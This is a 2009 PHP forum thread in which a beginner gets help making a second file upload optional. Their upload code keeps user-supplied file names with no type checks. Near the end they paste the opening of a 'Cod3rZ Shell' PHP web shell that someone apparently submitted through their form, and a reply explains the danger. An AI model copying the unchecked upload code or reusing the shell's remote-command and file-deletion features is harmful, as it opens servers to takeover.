Derby Artists Posted October 2, 2009 Share Posted October 2, 2009 Hi I have a problem with my uploader, the trouble is I want the user to have the option to either upload 1 or 2 files, the trouble is if the user only uploads one image it brings this echo into play echo "Sorry, there was a problem uploading your file."; It works fine if they use both uploaders. There is a couple of questions, would you take the uploader out and create a link to a seperate php form to upload, or is there a simple fix for this. I will not include all the code just the uploader code $target = "image/"; $target = $target . basename( $_FILES['upload']['name']); $target2 = "image/"; $target2= $target2 . basename( $_FILES['upload1']['name']); if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) { echo "The file ". basename( $_FILES['upload']['name']); echo "and " . basename( $_FILES['upload1']['name'])." have been uploaded, and your information has been added to the directory"; Could you also let me know if the echo's are ok in the above code Thanks in advance Quote Link to comment Share on other sites More sharing options...
cags Posted October 2, 2009 Share Posted October 2, 2009 If the second file is optional, before running any line of code to-do with it you would use something like... <?php if(isset($_FILES['upload1'])) { // the code to perform on the file here } ?> Quote Link to comment Share on other sites More sharing options...
Derby Artists Posted October 2, 2009 Author Share Posted October 2, 2009 Cheers Cags, but still getting the same results Quote Link to comment Share on other sites More sharing options...
mikesta707 Posted October 2, 2009 Share Posted October 2, 2009 where did you put cags code? that is the solution I would have used. Can you post your code? (in code tags) Quote Link to comment Share on other sites More sharing options...
Derby Artists Posted October 2, 2009 Author Share Posted October 2, 2009 Hi I have tried the code in a few places, but as a noob guesstimate I thought these looked the most likely <?php $target = "image/"; $target = $target . basename( $_FILES['upload']['name']); if(isset($_FILES['upload1'])) { $target2 = "image/"; $target2= $target2 . basename( $_FILES['upload1']['name']); } $name=$_POST['name']; $address=$_POST['address']; $address1=$_POST['address1']; I also tried it here $mobile=$_POST['mobile']; $email=$_POST['email']; $upload=($_FILES['upload']['name']); if(isset($_FILES['upload1'])) { $upload1=($_FILES['upload1']['name']); } $bio=$_POST['bio']; Quote Link to comment Share on other sites More sharing options...
cags Posted October 2, 2009 Share Posted October 2, 2009 You need it everywhere you access that $variable. Just from your first post I can see at least one other place you need it if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) Quote Link to comment Share on other sites More sharing options...
Derby Artists Posted October 2, 2009 Author Share Posted October 2, 2009 Sorry Cags was under the impression I only needed to put it in one place. Cool will have a bash now mate Quote Link to comment Share on other sites More sharing options...
Derby Artists Posted October 2, 2009 Author Share Posted October 2, 2009 Just to make sure, When I am placing this in with the variable I take it I use the {} ie if(isset($_FILES['upload1'])) { $target2 = "image/"; $target2= $target2 . basename( $_FILES['upload1']['name']); } if(isset($_FILES['upload1'])) { $upload1=($_FILES['upload1']['name']); } Is this the way if the line already begins with "if" ie if(isset($_FILES['upload1'])) if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) its this line that is confussing me the most. When I play around with it it starts throwing up errors Oh I take it I leave this one alone and DO NOT insert the if(isset($_FILES['upload1'])) into this line mysql_real_escape_string($upload1), thanks again Quote Link to comment Share on other sites More sharing options...
cags Posted October 2, 2009 Share Posted October 2, 2009 Yes as it's a block on only want to happen if it's true, then you have to surrounded it in the squiggly brackets to make it a code block. if you do... if(isset($_FILES['upload1'])) { if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) { } } Then neither file will get moved if upload1 doesn't exist. With regards to inserting it into the database you will need to set up some kind of system so that if the file doesn't exist your query will still work only insert a blank string rather than the filename. Quote Link to comment Share on other sites More sharing options...
Derby Artists Posted October 2, 2009 Author Share Posted October 2, 2009 Forgive me if Im totally wrong, but I am assuming that this statement you put up if(isset($_FILES['upload1'])) { if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) { } } is asking for both files to be put into the folder on the server, so I am guessing it is looking for 2 files to put on the server, what I am trying to get at is the && am i right in that this means both are true (meaning the user has attached the two files)if not throw an error By the way if I use this code I am getting an error at line 43 Parse error: syntax error, unexpected T_ELSE in /customers/derbyartists.co.uk/derbyartists.co.uk/httpd.www/php/signup1.php on line 43 line 43:- else { echo "Sorry, there was a problem uploading your file."; } ?> Quote Link to comment Share on other sites More sharing options...
cags Posted October 2, 2009 Share Posted October 2, 2009 if(isset($_FILES['upload1'])) { if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) { } } Was an example of what was wrong, but yes that inner iff statement says if 'upload' successfully moved and 'upload1' successfully moved. else { echo "Sorry, there was a problem uploading your file."; } The error message tells you the problem unexpected ELSE, basically the only valid place for the ELSE statement is... if($something) { // do summit } HERE Before somebody points out, I don't mean exacly there, it can be on the line below, the point is there can't be anything else between the closing bracket of an if statment and the word else. Quote Link to comment Share on other sites More sharing options...
Derby Artists Posted October 3, 2009 Author Share Posted October 3, 2009 Well I see where you are coming from now people, I think with this I am going to go back to the drawing board and start again....I fully understand why they call php the voodoo language. I have managed to get so far and then the more tutorials I look at the more complex it becomes. Yeah Ok I have managed to get two files to upload to my server "which personally I am happy with" but a message of advice from a noob, to a noob, if you are trying to upload multiple files. Take on board you need to include script to help:- 1-To stop two file names the same being uploaded 2-Security for the databse and your server 3-The user may only want to upload 1 image, so you have to tell the php file and sql about the fact. 4-Take into consideration symbols in the users file names. There maybe many more considerations but these are the main ones I have picked up on. I now hang my head in shame, as you have all beat me with a stick, here is me thinking it be simple as I cracked two file uploads to mail, so how hard can be getting them to an sql and send the user an email repsonse...Basic........VERY WRONG. Like Cags and Tim etc have said, go back to the very basics starting with <?php Quote Link to comment Share on other sites More sharing options...
cags Posted October 3, 2009 Share Posted October 3, 2009 Once you understand the basic building blocks, what your currently attempting is not considered anything too complicated. But the first thing you need to learn is the building blocks. I only picked up PHP about 4 months ago, but I have had experience in plenty of other programming languages (Java, C, VB6, VB .NET, C#) to a large degree once you know one, picking up another is fairly pain free, you just have to learn the intricacies of the particular syntax. I taught myself with help from http://www.youtube.com/phpacademy, you may pick up a few minor bad habits from the tutorials, but it will certainly help you get a grounding. Once you have been through the PHP Basics playlist, the advice given by people on forums such as this should start to make a whole lot more sense. Quote Link to comment Share on other sites More sharing options...
Derby Artists Posted October 3, 2009 Author Share Posted October 3, 2009 Cags what software do you use if any or which do you recommend to a noob yo php Quote Link to comment Share on other sites More sharing options...
cags Posted October 3, 2009 Share Posted October 3, 2009 The best free application I've personally used is Notepad++, the ability to code highlight and also show matching brackets (ie. if you click on an opening bracket it highlights the corresponding closing bracket) are invaluable. Quote Link to comment Share on other sites More sharing options...
Derby Artists Posted October 3, 2009 Author Share Posted October 3, 2009 Last thing cags, I have just recieved an email because I m still using form to mail and testing the database on a different server, 3 emails in total the first read something like this, not going to put all the code up just the start <?php # Cod3rZ Shell 5.2 # c0ded by Cod3rZ # http://cod3rz.helloweb.eu # http://devilsnight.altervista.org # 07/08/08 # Cuz We Back Rude This Time # Thanks to nexen error_reporting(0); $version = '5.2'; $info = $_SERVER['SERVER_SOFTWARE']; $page = $_SERVER['SCRIPT_NAME']; $site = getenv("HTTP_HOST"); $uname = php_uname(); $smod = ini_get('safe_mode'); $uid = getmyuid(); $gid = getmygid(); $dir = realpath($_POST['dir']); $mkdir = $_POST['makedir']; $mydir = $_POST['deletedir']; $cmd = $_GET['cmd']; $host = $_POST['host']; $proto = $_POST['protocol']; $delete = $_POST['delete']; $phpeval = $_POST['php_eval']; $db = $_POST['db']; $query = $_POST['query']; $user = $_POST['user']; $pass = $_POST['passd']; $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); $quotes = get_magic_quotes_gpc(); if ($quotes == "1" or $quotes == "on") { Is someone trying to get in Quote Link to comment Share on other sites More sharing options...
cags Posted October 3, 2009 Share Posted October 3, 2009 Depends on the circumstance. Theoretically if they can trick your system into uploading a file with that content on to your server, they could then open that file and cause all sorts of havoc. Judging by the part you posted, that script, if ran on your server would give somebody access to knowing what various settings are on your server (which would make hacking it easier) it also looks like it would allow them to delete various files and folders. The downside of providing any URL's on a site such as this. People can view your skill level, they know where your site is, and in many situations they know what your code is. This makes it countless times easier to hack your site. Quote Link to comment Share on other sites More sharing options...
Derby Artists Posted October 3, 2009 Author Share Posted October 3, 2009 thanks will bear that in mind when i return with errors Quote Link to comment Share on other sites More sharing options...
cags Posted October 3, 2009 Share Posted October 3, 2009 It would also depend on your server setup, whether your are filtering for file type, how you rename the file when you move it. If for example when the user is uploading a file you have no checks to see what type it is and when you move it you keep the same file extention then all the user has to do is upload any file they want and they essentially have faily open access to your site. If you check the filetype or change the file extention this will become slightly more difficult as most servers by default will only parse PHP information which is store in a .php file (in some cases .html) and are highly unlikely to cause much trouble if the file extention is .jpg/.gif etc. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.